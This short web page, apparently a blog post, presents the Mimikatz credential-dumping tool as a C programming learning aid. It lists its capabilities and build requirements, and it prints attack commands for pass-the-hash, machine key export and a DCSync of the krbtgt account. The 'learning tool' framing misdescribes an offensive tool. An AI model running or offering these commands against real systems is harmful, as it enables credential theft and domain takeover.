Mimikatz C Learning Tool
Definition: For learning C language we used mimikatz. it is a tool by which we can easily learn C programming language and can also do experiments with Windows security.
What can mimikatz do?
Mimikatz can perform many things, among them the most popular are:
- It can extract plaintexts passwords
- PIN code and kerberos tickets from memory
- It can also perform pass-the-hash
- Along with that it can also performpass-the-ticket or build Golden tickets.
2.1 alpha 20160208 (oe.eo) edition has been released 6 days ago.
For the usage purpose you can use it like below:
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
crypto::keys /machine /export
vault & lsadump
lsadump::dcsync /user:domain\krbtgt /domain:lab.local
Prerequisites for mimikatz tool are: is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are:
- It needs Visual Studio 2010, 2012 or 2013 for Desktop (2013 Express for Desktop is free and supports x86 & x64).
- It also require Windows Driver Kit 7.1 (WinDDK) for mimikatz driver.
For Building the solution:
Open the solution and you can change the architecture also Build / Build Solution.
After that it is ready to installed.